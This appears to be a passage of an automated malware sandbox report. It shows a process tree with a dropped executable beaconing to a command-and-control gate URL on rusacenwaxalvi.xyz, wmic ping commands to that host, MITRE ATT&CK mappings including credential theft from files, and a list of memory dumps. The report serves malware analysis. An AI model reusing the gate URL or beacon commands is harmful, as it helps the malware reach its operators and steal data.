    X http://rusacenwaxalvi.xyz/dimwebpan/gate.php*Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141*7052770e4931b3197e6e9a0bccc1d841
    3⤵
    - Executes dropped EXE
    PID:960
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get StatusCode /FORMAT:List
    3⤵
    PID:296
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='rusacenwaxalvi.xyz' get ResponseTime /FORMAT:List
    3⤵
    PID:1292

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/296-2-0x0000000076381000-0x0000000076383000-memory.dmp

Filesize
8KB

Download
memory/296-3-0x0000000004010000-0x0000000006262000-memory.dmp

Filesize
34.3MB

Download
memory/296-4-0x0000000000400000-0x0000000002652000-memory.dmp

Filesize
34.3MB

Download
memory/296-112-0x0000000077580000-0x0000000077581000-memory.dmp

Filesize
4KB

Download
memory/328-59-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/328-52-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/772-122-0x0000000006A60000-0x0000000006A61000-memory.dmp

Filesize
4KB

Download
memory/880-10-0x000007FEF6580000-0x000007FEF67FA000-memory.dmp

Filesize
2.5MB

Download
memory/976-71-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1060-11-0x00000000040F0000-0x0000000006342000-memory.dmp

Filesize
34.3MB

Download
memory/1448-49-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/1448-58-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/1656-22-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1656-26-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/1668-73-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1668-60-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1692-41-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/1692-45-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/1696-36-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/1696-40-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/1848-155-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/1852-88-0x0000000001FF0000-0x0000000002001000-memory.dmp

Filesize
68KB

Download
memory/1852-96-0x0000000000390000-0x0000000000391000-memory.dmp

Filesize
4KB

Download
memory/1956-28-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1956-33-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1992-78-0x0000000001EA0000-0x0000000001EB1000-memory.dmp

Filesize
68KB

Download
memory/1992-83-0x0000000002520000-0x0000000002531000-memory.dmp

Filesize
68KB

Download
memory/1992-76-0x0000000001EA0000-0x0000000001EB1000-memory.dmp

Filesize
68KB

Download
memory/1992-86-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/2036-75-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2036-66-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2072-138-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2072-141-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2072-179-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2108-192-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2108-188-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2108-143-0x0000000000880000-0x00000000008800B0-memory.dmp

Filesize
176B

Download
memory/2152-180-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2152-159-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-187-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-162-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-146-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-173-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-145-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-148-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-186-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-149-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-147-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-181-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-185-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-184-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-183-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download
memory/2180-182-0x0000000000080000-0x00000000000800B0-memory.dmp

Filesize
176B

Download